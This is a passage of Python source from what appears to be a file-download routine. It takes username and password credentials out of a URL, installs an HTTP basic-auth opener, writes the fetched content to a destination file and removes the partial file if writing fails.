            auth, barehost = splituser(netloc)
            if auth is not None:
                source = urlunparse((proto, barehost, path, params, query, fragment))
                username, password = splitpasswd(auth)
                passman = HTTPPasswordMgrWithDefaultRealm()
                # Realm is set to None in add_password to force the username and password
                # to be used whatever the realm
                passman.add_password(None, source, username, password)
                authhandler = HTTPBasicAuthHandler(passman)
                opener = build_opener(authhandler)
                install_opener(opener)
        response = urlopen(source)
        try:
            with open(dest, 'wb') as dest_file:
                dest_file.write(response.read())
        except Exception as e:
            if os.path.isfile(dest):
                os.unlink(dest)
            raise e

    # Mandatory file validation via Sha1 or MD5 hashing.